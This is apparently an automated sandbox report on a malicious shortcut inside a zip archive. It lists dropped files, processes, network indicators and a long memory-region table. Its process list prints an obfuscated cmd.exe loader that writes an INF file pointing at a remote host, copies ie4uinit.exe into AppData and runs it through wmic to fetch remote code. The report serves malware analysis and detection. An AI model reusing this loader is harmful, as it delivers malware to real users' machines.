Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Education and Experience.lnk(1).zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-basesettings.log
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\ieuinit.inf
|
Windows setup INFormation
|
dropped
|
||
C:\Users\user\Favorites\Bing.url
|
Generic INItialization configuration [InternetShortcut]
|
dropped
|
||
C:\Windows\Temp\OLDF396.tmp
|
Windows setup INFormation
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wbem\WMIC.exe
|
wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
|
||
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
|
C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
|
||
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
|
C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
|
||
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
|
"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
|
||
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
|
"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
|
||
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
|
"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for
%u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t"
&& set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf"
&& set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!"
&& (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]"
"UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783"
"[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me='
'" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%")
do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2!
"!Lucky11!*" | set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2!
-base!Lucky23!" | set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses
Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles
Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements
Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs
Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations
Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers
Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange
Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories
Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla
Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend
Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
|
||
C:\Windows\System32\xcopy.exe
|
xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe
-basesettings" "
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message
Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks
Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series
Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas
Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives
Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind
Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials
Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations
Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres
Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances
Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\rundll32.exe
|
C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
|
There are 5 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=
|
unknown
|
||
http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
|
unknown
|
||
https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=
|
unknown
|
||
https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=
|
unknown
|
||
http://sophia-lagoon.net/81754783
|
142.11.222.59
|
||
http://sophia-lagoon.net/81754783WWC:
|
unknown
|
||
http://sophia-lagoon.net/81754783lP
|
unknown
|
||
https://www.baidu.com/s?tn=80035161_2_dg&wd=
|
unknown
|
||
https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
sophia-lagoon.net
|
142.11.222.59
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
142.11.222.59
|
sophia-lagoon.net
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SQM
|
InstallDate
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2474C1C0000
|
heap
|
page read and write
|
||
1D9DD42D000
|
heap
|
page read and write
|
||
16371D95000
|
heap
|
page read and write
|
||
1AF64137000
|
heap
|
page read and write
|
||
28F98039000
|
unkown
|
page read and write
|
||
1D9DD38A000
|
heap
|
page read and write
|
||
B4CB5FF000
|
stack
|
page read and write
|
||
11A2C7E000
|
stack
|
page read and write
|
||
1C8F49BF000
|
heap
|
page read and write
|
||
23927313000
|
heap
|
page read and write
|
||
2474BFBA000
|
heap
|
page read and write
|
||
7FF63F4F1000
|
unkown
|
page execute read
|
||
1D9DD3DE000
|
heap
|
page read and write
|
||
2474BFCC000
|
heap
|
page read and write
|
||
2474DF90000
|
heap
|
page read and write
|
||
1766C85A000
|
heap
|
page read and write
|
||
21845C47000
|
heap
|
page read and write
|
||
7FF5ADCC1000
|
unkown
|
page readonly
|
||
7FF5ADC2E000
|
unkown
|
page readonly
|
||
1D9DD3B5000
|
heap
|
page read and write
|
||
1D9DD418000
|
heap
|
page read and write
|
||
1AF63FD0000
|
heap
|
page read and write
|
||
21845C2B000
|
heap
|
page read and write
|
||
B4CB6FA000
|
stack
|
page read and write
|
||
1D9DD3F1000
|
heap
|
page read and write
|
||
1AF640BD000
|
heap
|
page read and write
|
||
2474C031000
|
heap
|
page read and write
|
||
28F97F60000
|
unkown
|
page read and write
|
||
1D9DDC52000
|
heap
|
page read and write
|
||
1AF642B0000
|
heap
|
page read and write
|
||
1C8F4A7A000
|
heap
|
page read and write
|
||
1D9DD360000
|
heap
|
page read and write
|
||
1D9DD630000
|
heap
|
page read and write
|
||
1D9DDC5F000
|
heap
|
page read and write
|
||
1D9DDF4C000
|
heap
|
page read and write
|
||
1759FE80000
|
heap
|
page read and write
|
||
1D9DD3F4000
|
heap
|
page read and write
|
||
1D9DD406000
|
heap
|
page read and write
|
||
1D9DD40A000
|
heap
|
page read and write
|
||
1D9DD3D1000
|
heap
|
page read and write
|
||
21845C5B000
|
heap
|
page read and write
|
||
23927200000
|
heap
|
page read and write
|
||
1D9DDC69000
|
heap
|
page read and write
|
||
116DC228000
|
heap
|
page read and write
|
||
1D9DD413000
|
heap
|
page read and write
|
||
4761C7E000
|
stack
|
page read and write
|
||
1D9DD41B000
|
heap
|
page read and write
|
||
1D9DD3B6000
|
heap
|
page read and write
|
||
21846402000
|
trusted library allocation
|
page read and write
|
||
DCD098D000
|
stack
|
page read and write
|
||
1C8F4327000
|
heap
|
page read and write
|
||
2474C022000
|
heap
|
page read and write
|
||
21845C69000
|
heap
|
page read and write
|
||
2392724C000
|
heap
|
page read and write
|
||
1D9DDF47000
|
heap
|
page read and write
|
||
62616D000
|
stack
|
page read and write
|
||
1C8F4980000
|
heap
|
page read and write
|
||
A56B27F000
|
stack
|
page read and write
|
||
CBBF96A000
|
stack
|
page read and write
|
||
1D9DD421000
|
heap
|
page read and write
|
||
1F02BA62000
|
heap
|
page read and write
|
||
1D9DD3B0000
|
heap
|
page read and write
|
||
3E207E000
|
stack
|
page read and write
|
||
7FF63F4F0000
|
unkown
|
page readonly
|
||
2474DEA0000
|
heap
|
page read and write
|
||
28F982D0000
|
unkown
|
page readonly
|
||
1D9DD412000
|
heap
|
page read and write
|
||
1AF6408F000
|
heap
|
page read and write
|
||
28F9803E000
|
unkown
|
page read and write
|
||
8C15B7D000
|
stack
|
page read and write
|
||
B8EF37E000
|
stack
|
page read and write
|
||
B72C9DB000
|
stack
|
page read and write
|
||
36E767E000
|
stack
|
page read and write
|
||
1D9DD3E3000
|
heap
|
page read and write
|
||
1F377444000
|
heap
|
page read and write
|
||
1C8F496D000
|
heap
|
page read and write
|
||
11A317C000
|
stack
|
page read and write
|
||
1D9DDC61000
|
heap
|
page read and write
|
||
2474E2C2000
|
heap
|
page read and write
|
||
8C15AFE000
|
stack
|
page read and write
|
||
B8EEE7E000
|
stack
|
page read and write
|
||
1D9DD44D000
|
heap
|
page read and write
|
||
1D9DD421000
|
heap
|
page read and write
|
||
21845C80000
|
heap
|
page read and write
|
||
1C8F4A45000
|
heap
|
page read and write
|
||
11A327F000
|
stack
|
page read and write
|
||
1766C800000
|
heap
|
page read and write
|
||
1D9DDF40000
|
heap
|
page read and write
|
||
1D9DD426000
|
heap
|
page read and write
|
||
1AF64073000
|
heap
|
page read and write
|
||
1D9DDF56000
|
heap
|
page read and write
|
||
23E7A590000
|
heap
|
page read and write
|
||
2784FCC4000
|
heap
|
page read and write
|
||
1759FE2B000
|
heap
|
page read and write
|
||
116DC070000
|
heap
|
page read and write
|
||
1C8F4968000
|
heap
|
page read and write
|
||
1AF64057000
|
heap
|
page read and write
|
||
1D9DD42C000
|
heap
|
page read and write
|
||
1C8F49DF000
|
heap
|
page read and write
|
||
1AF6424E000
|
heap
|
page read and write
|
||
7FF5ADD6D000
|
unkown
|
page readonly
|
||
1C8F44B5000
|
heap
|
page read and write
|
||
1D9DD393000
|
heap
|
page read and write
|
||
2BDF9675000
|
heap
|
page read and write
|
||
252589A0000
|
heap
|
page read and write
|
||
1D9DD280000
|
heap
|
page read and write
|
||
1D9DD440000
|
heap
|
page read and write
|
||
1D9DD3F4000
|
heap
|
page read and write
|
||
2474C013000
|
heap
|
page read and write
|
||
21845C8F000
|
heap
|
page read and write
|
||
1F626B80000
|
heap
|
page read and write
|
||
3E247C000
|
stack
|
page read and write
|
||
1C8F4920000
|
heap
|
page read and write
|
||
247504A0000
|
heap
|
page read and write
|
||
7FF63F525000
|
unkown
|
page read and write
|
||
3E1E7E000
|
stack
|
page read and write
|
||
1D9DD3F9000
|
heap
|
page read and write
|
||
1D9DDF3A000
|
heap
|
page read and write
|
||
16371BA0000
|
heap
|
page read and write
|
||
2474C008000
|
heap
|
page read and write
|
||
1C8F4A20000
|
heap
|
page read and write
|
||
2525A470000
|
heap
|
page read and write
|
||
7FF5ADD1A000
|
unkown
|
page readonly
|
||
1F02BA40000
|
heap
|
page read and write
|
||
2474C02A000
|
heap
|
page read and write
|
||
116DC25C000
|
heap
|
page read and write
|
||
1D9DD3F9000
|
heap
|
page read and write
|
||
1C8F4A66000
|
heap
|
page read and write
|
||
1766C700000
|
heap
|
page read and write
|
||
B4CB274000
|
stack
|
page read and write
|
||
1F02BA7E000
|
heap
|
page read and write
|
||
1D9DD2A0000
|
heap
|
page read and write
|
||
23E7A5D0000
|
heap
|
page read and write
|
||
25258B45000
|
heap
|
page read and write
|
||
1766C874000
|
heap
|
page read and write
|
||
36E6D5D000
|
stack
|
page read and write
|
||
1D9DD3BD000
|
heap
|
page read and write
|
||
36E72F9000
|
stack
|
page read and write
|
||
1D9DD425000
|
heap
|
page read and write
|
||
B72CFF7000
|
stack
|
page read and write
|
||
1D9DD415000
|
heap
|
page read and write
|
||
47619DE000
|
stack
|
page read and write
|
||
2474C022000
|
heap
|
page read and write
|
||
1F02BA13000
|
heap
|
page read and write
|
||
3E1EFE000
|
stack
|
page read and write
|
||
1D9DD41B000
|
heap
|
page read and write
|
||
28F98002000
|
unkown
|
page read and write
|
||
2474C063000
|
heap
|
page read and write
|
||
7FF5ADCBE000
|
unkown
|
page readonly
|
||
B8EEB8B000
|
stack
|
page read and write
|
||
2474DF10000
|
heap
|
page read and write
|
||
1759FD40000
|
heap
|
page read and write
|
||
1AF6424A000
|
heap
|
page read and write
|
||
1D9DD3F4000
|
heap
|
page read and write
|
||
2784F9C0000
|
heap
|
page read and write
|
||
21845C41000
|
heap
|
page read and write
|
||
1AF642BB000
|
heap
|
page read and write
|
||
4761EFF000
|
stack
|
page read and write
|
||
175A0602000
|
trusted library allocation
|
page read and write
|
||
1D9DD426000
|
heap
|
page read and write
|
||
1D9DDC61000
|
heap
|
page read and write
|
||
1D9DD3F9000
|
heap
|
page read and write
|
||
21845C35000
|
heap
|
page read and write
|
||
255F47C000
|
stack
|
page read and write
|
||
28F97F30000
|
heap
|
page read and write
|
||
1759FE13000
|
heap
|
page read and write
|
||
21845C8D000
|
heap
|
page read and write
|
||
1F626DA5000
|
heap
|
page read and write
|
||
28F98015000
|
unkown
|
page read and write
|
||
3005D7F000
|
stack
|
page read and write
|
||
23E7A7B5000
|
heap
|
page read and write
|
||
3005EFF000
|
stack
|
page read and write
|
||
1F377C02000
|
trusted library allocation
|
page read and write
|
||
1D9DDF33000
|
heap
|
page read and write
|
||
21845C62000
|
heap
|
page read and write
|
||
222387B000
|
stack
|
page read and write
|
||
1F37742B000
|
heap
|
page read and write
|
||
2474C255000
|
heap
|
page read and write
|
||
1D9DD440000
|
heap
|
page read and write
|
||
1D9DD3E1000
|
heap
|
page read and write
|
||
2474C250000
|
heap
|
page read and write
|
||
7FF63F527000
|
unkown
|
page readonly
|
||
23927240000
|
heap
|
page read and write
|
||
1F377434000
|
heap
|
page read and write
|
||
1D9DD415000
|
heap
|
page read and write
|
||
1E0A1D90000
|
heap
|
page read and write
|
||
23927239000
|
heap
|
page read and write
|
||
28F98037000
|
unkown
|
page read and write
|
||
B72D37E000
|
stack
|
page read and write
|
||
36E757E000
|
stack
|
page read and write
|
||
16371BA8000
|
heap
|
page read and write
|
||
7FF63F517000
|
unkown
|
page readonly
|
||
F5C5EFE000
|
stack
|
page read and write
|
||
36E747E000
|
stack
|
page read and write
|
||
4761D7F000
|
stack
|
page read and write
|
||
23927302000
|
heap
|
page read and write
|
||
1D9DD3FA000
|
heap
|
page read and write
|
||
21845C57000
|
heap
|
page read and write
|
||
1759FE39000
|
heap
|
page read and write
|
||
1D9DD445000
|
heap
|
page read and write
|
||
116DC240000
|
heap
|
page read and write
|
||
1C8F43EB000
|
heap
|
page read and write
|
||
3E217D000
|
stack
|
page read and write
|
||
1D9DDC53000
|
heap
|
page read and write
|
||
B4CB276000
|
stack
|
page read and write
|
||
1D9DD3DE000
|
heap
|
page read and write
|
||
2474C03E000
|
heap
|
page read and write
|
||
23E7A570000
|
heap
|
page read and write
|
||
1AF65EE0000
|
heap
|
page read and write
|
||
21845C46000
|
heap
|
page read and write
|
||
A56AFCE000
|
stack
|
page read and write
|
||
28F98000000
|
unkown
|
page read and write
|
||
1D9DD3FE000
|
heap
|
page read and write
|
||
29C035F000
|
stack
|
page read and write
|
||
B8EF07E000
|
stack
|
page read and write
|
||
7FF63F517000
|
unkown
|
page readonly
|
||
1D9DD443000
|
heap
|
page read and write
|
||
1D9DD3F1000
|
heap
|
page read and write
|
||
1D9DD3F1000
|
heap
|
page read and write
|
||
B8EF17F000
|
stack
|
page read and write
|
||
1D9DD3E0000
|
heap
|
page read and write
|
||
255F37C000
|
stack
|
page read and write
|
||
1D9DDC5B000
|
heap
|
page read and write
|
||
1D9DD37B000
|
heap
|
page read and write
|
||
7FF5ADCAD000
|
unkown
|
page readonly
|
||
1D9DDC52000
|
heap
|
page read and write
|
||
2474BFBE000
|
heap
|
page read and write
|
||
21845C48000
|
heap
|
page read and write
|
||
23927265000
|
heap
|
page read and write
|
||
1C8F4971000
|
heap
|
page read and write
|
||
1D9DD160000
|
heap
|
page read and write
|
||
8EB27FE000
|
stack
|
page read and write
|
||
1766C841000
|
heap
|
page read and write
|
||
1D9DDF3A000
|
heap
|
page read and write
|
||
2784F9C8000
|
heap
|
page read and write
|
||
1F377413000
|
heap
|
page read and write
|
||
28F98664000
|
unkown
|
page readonly
|
||
1C8F4412000
|
heap
|
page read and write
|
||
7FF5ADD23000
|
unkown
|
page readonly
|
||
2784F8D0000
|
heap
|
page read and write
|
||
1AF64073000
|
heap
|
page read and write
|
||
1AF64245000
|
heap
|
page read and write
|
||
1D9DDC5F000
|
heap
|
page read and write
|
||
1D9DD406000
|
heap
|
page read and write
|
||
2474C022000
|
heap
|
page read and write
|
||
1AF64244000
|
heap
|
page read and write
|
||
255ECFC000
|
stack
|
page read and write
|
||
247505A0000
|
trusted library allocation
|
page read and write
|
||
1F626BA0000
|
heap
|
page read and write
|
||
1C8F4A21000
|
heap
|
page read and write
|
||
F5C5BCB000
|
stack
|
page read and write
|
||
1D9DD44D000
|
heap
|
page read and write
|
||
36E71FE000
|
stack
|
page read and write
|
||
1F377390000
|
heap
|
page read and write
|
||
1D9DDC65000
|
heap
|
page read and write
|
||
1D9DDC73000
|
heap
|
page read and write
|
||
1D9DD435000
|
heap
|
page read and write
|
||
1C8F43BD000
|
heap
|
page read and write
|
||
1D9DD41B000
|
heap
|
page read and write
|
||
7FF5ADD07000
|
unkown
|
page readonly
|
||
2392725B000
|
heap
|
page read and write
|
||
1D9DD428000
|
heap
|
page read and write
|
||
1AF64091000
|
heap
|
page read and write
|
||
1D9DD406000
|
heap
|
page read and write
|
||
2474BFD0000
|
heap
|
page read and write
|
||
1E0A1C10000
|
heap
|
page read and write
|
||
2474E0D0000
|
heap
|
page read and write
|
||
28F98661000
|
unkown
|
page readonly
|
||
1AF6406C000
|
heap
|
page read and write
|
||
222367C000
|
stack
|
page read and write
|
||
1D9DDC75000
|
heap
|
page read and write
|
||
1AF64051000
|
heap
|
page read and write
|
||
36E717E000
|
stack
|
page read and write
|
||
1D9DD437000
|
heap
|
page read and write
|
||
1D9DD421000
|
heap
|
page read and write
|
||
1D9DD42F000
|
heap
|
page read and write
|
||
1D9DD40A000
|
heap
|
page read and write
|
||
1F02BB00000
|
heap
|
page read and write
|
||
8C15A7D000
|
stack
|
page read and write
|
||
21845A10000
|
heap
|
page read and write
|
||
1D9DD43E000
|
heap
|
page read and write
|
||
36E73FE000
|
stack
|
page read and write
|
||
1F02B970000
|
trusted library allocation
|
page read and write
|
||
2BDF9610000
|
heap
|
page read and write
|
||
1766C750000
|
heap
|
page read and write
|
||
3005BFE000
|
stack
|
page read and write
|
||
23E7A430000
|
heap
|
page read and write
|
||
1C8F43DA000
|
heap
|
page read and write
|
||
7FF5AD932000
|
unkown
|
page readonly
|
||
1AF6424A000
|
heap
|
page read and write
|
||
28F98661000
|
unkown
|
page readonly
|
||
21845C85000
|
heap
|
page read and write
|
||
1D9DDC5B000
|
heap
|
page read and write
|
||
2474C043000
|
heap
|
page read and write
|
||
1D9DD425000
|
heap
|
page read and write
|
||
1D9DD43D000
|
heap
|
page read and write
|
||
16371BF1000
|
heap
|
page read and write
|
||
29C067F000
|
stack
|
page read and write
|
||
1D9DD402000
|
heap
|
page read and write
|
||
1D9DD43D000
|
heap
|
page read and write
|
||
1D9DD42C000
|
heap
|
page read and write
|
||
1D9DDF32000
|
heap
|
page read and write
|
||
7FF63F525000
|
unkown
|
page read and write
|
||
1AF6409F000
|
heap
|
page read and write
|
||
1D9DDC6F000
|
heap
|
page read and write
|
||
2474C058000
|
heap
|
page read and write
|
||
21845C6C000
|
heap
|
page read and write
|
||
1D9DD388000
|
heap
|
page read and write
|
||
1D9DD3F1000
|
heap
|
page read and write
|
||
21845C61000
|
heap
|
page read and write
|
||
1D9DD420000
|
heap
|
page read and write
|
||
21845C8D000
|
heap
|
page read and write
|
||
16371D80000
|
heap
|
page read and write
|
||
1D9DD435000
|
heap
|
page read and write
|
||
36E74F9000
|
stack
|
page read and write
|
||
1D9DD3B5000
|
heap
|
page read and write
|
||
1D9DD3CE000
|
heap
|
page read and write
|
||
21845A20000
|
heap
|
page read and write
|
||
3E21FE000
|
stack
|
page read and write
|
||
2BDF9630000
|
heap
|
page read and write
|
||
1AF64144000
|
heap
|
page read and write
|
||
1F377513000
|
heap
|
page read and write
|
||
B72D07E000
|
stack
|
page read and write
|
||
2474DF30000
|
trusted library allocation
|
page read and write
|
||
1D9DD445000
|
heap
|
page read and write
|
||
28F97EC0000
|
heap
|
page read and write
|
||
1D9DD439000
|
heap
|
page read and write
|
||
21845C44000
|
heap
|
page read and write
|
||
1D9DD370000
|
heap
|
page read and write
|
||
1F377502000
|
heap
|
page read and write
|
||
1D9DD411000
|
heap
|
page read and write
|
||
1D9DD3BD000
|
heap
|
page read and write
|
||
1D9DDF30000
|
heap
|
page read and write
|
||
1D9DDC5C000
|
heap
|
page read and write
|
||
1D9DDC53000
|
heap
|
page read and write
|
||
1F02BB02000
|
heap
|
page read and write
|
||
1AF64092000
|
heap
|
page read and write
|
||
1AF6413B000
|
heap
|
page read and write
|
||
1F02BB13000
|
heap
|
page read and write
|
||
1D9DD440000
|
heap
|
page read and write
|
||
21845C68000
|
heap
|
page read and write
|
||
1D9DD410000
|
heap
|
page read and write
|
||
1D9DD447000
|
heap
|
page read and write
|
||
1D9DD39E000
|
heap
|
page read and write
|
||
1D9DDC63000
|
heap
|
page read and write
|
||
8EB25F7000
|
stack
|
page read and write
|
||
1D9DD40C000
|
heap
|
page read and write
|
||
7FF63F52A000
|
unkown
|
page readonly
|
||
1AF64030000
|
heap
|
page read and write
|
||
2474C039000
|
heap
|
page read and write
|
||
7FF63F517000
|
unkown
|
page readonly
|
||
1D9DDC50000
|
heap
|
page read and write
|
||
1AF640B3000
|
heap
|
page read and write
|
||
7FF63F525000
|
unkown
|
page read and write
|
||
1AF6404A000
|
heap
|
page read and write
|
||
21845C6D000
|
heap
|
page read and write
|
||
1D9DDF3E000
|
heap
|
page read and write
|
||
1D9DD418000
|
heap
|
page read and write
|
||
3005E7F000
|
stack
|
page read and write
|
||
2474DEF0000
|
heap
|
page read and write
|
||
23E7A7B0000
|
heap
|
page read and write
|
||
25258B00000
|
heap
|
page read and write
|
||
7FF63F516000
|
unkown
|
page readonly
|
||
2474C01E000
|
heap
|
page read and write
|
||
1D9DDC62000
|
heap
|
page read and write
|
||
1C8F42B0000
|
heap
|
page read and write
|
||
1766C857000
|
heap
|
page read and write
|
||
1D9DD3CE000
|
heap
|
page read and write
|
||
1D9DD3D2000
|
heap
|
page read and write
|
||
C6EE4FF000
|
stack
|
page read and write
|
||
7FF5ADCE2000
|
unkown
|
page readonly
|
||
25258AE0000
|
heap
|
page read and write
|
||
28F98024000
|
unkown
|
page read and write
|
||
2474DF23000
|
heap
|
page read and write
|
||
23927060000
|
heap
|
page read and write
|
||
3005A79000
|
stack
|
page read and write
|
||
116DC255000
|
heap
|
page read and write
|
||
1D9DD439000
|
heap
|
page read and write
|
||
1D9DDC65000
|
heap
|
page read and write
|
||
1759FCE0000
|
heap
|
page read and write
|
||
1F37746F000
|
heap
|
page read and write
|
||
1D9DDF4B000
|
heap
|
page read and write
|
||
2474C033000
|
heap
|
page read and write
|
||
247505A0000
|
trusted library allocation
|
page read and write
|
||
2474DF30000
|
trusted library allocation
|
page read and write
|
||
1D9DD440000
|
heap
|
page read and write
|
||
29C06FE000
|
stack
|
page read and write
|
||
222377F000
|
stack
|
page read and write
|
||
116DC000000
|
heap
|
page read and write
|
||
1D9DD44E000
|
heap
|
page read and write
|
||
C6EE47C000
|
stack
|
page read and write
|
||
1766C886000
|
heap
|
page read and write
|
||
1AF64066000
|
heap
|
page read and write
|
||
1D9DD447000
|
heap
|
page read and write
|
||
2BDF9730000
|
heap
|
page read and write
|
||
2474FFA0000
|
heap
|
page read and write
|
||
1D9DD403000
|
heap
|
page read and write
|
||
222397F000
|
stack
|
page read and write
|
||
7FF5ADCAB000
|
unkown
|
page readonly
|
||
28F97EC0000
|
heap
|
page read and write
|
||
1D9DD3F4000
|
heap
|
page read and write
|
||
16371AE0000
|
heap
|
page read and write
|
||
1766C86A000
|
heap
|
page read and write
|
||
4761957000
|
stack
|
page read and write
|
||
163719A0000
|
heap
|
page read and write
|
||
1C8F4A88000
|
heap
|
page read and write
|
||
1AF640A4000
|
heap
|
page read and write
|
||
2BDF973B000
|
heap
|
page read and write
|
||
2474C150000
|
heap
|
page read and write
|
||
1D9DDC51000
|
heap
|
page read and write
|
||
6261EE000
|
stack
|
page read and write
|
||
1D9DDF34000
|
heap
|
page read and write
|
||
28F98802000
|
unkown
|
page read and write
|
||
21845C7A000
|
heap
|
page read and write
|
||
1C8F499F000
|
heap
|
page read and write
|
||
2474BFE2000
|
heap
|
page read and write
|
||
DCD0C7D000
|
stack
|
page read and write
|
||
1D9DD43E000
|
heap
|
page read and write
|
||
1E0A1CF0000
|
heap
|
page read and write
|
||
23927277000
|
heap
|
page read and write
|
||
1D9DD36C000
|
heap
|
page read and write
|
||
1F02D402000
|
trusted library allocation
|
page read and write
|
||
28F98102000
|
unkown
|
page read and write
|
||
21845C4D000
|
heap
|
page read and write
|
||
1D9DD44D000
|
heap
|
page read and write
|
||
11A2E7B000
|
stack
|
page read and write
|
||
21845C71000
|
heap
|
page read and write
|
||
1F626BA7000
|
heap
|
page read and write
|
||
B4CB37D000
|
stack
|
page read and write
|
||
8C157AC000
|
stack
|
page read and write
|
||
7FF5ADCF4000
|
unkown
|
page readonly
|
||
1D9DD3C8000
|
heap
|
page read and write
|
||
1AF6413C000
|
heap
|
page read and write
|
||
1F626CA0000
|
heap
|
page read and write
|
||
1C8F42D0000
|
heap
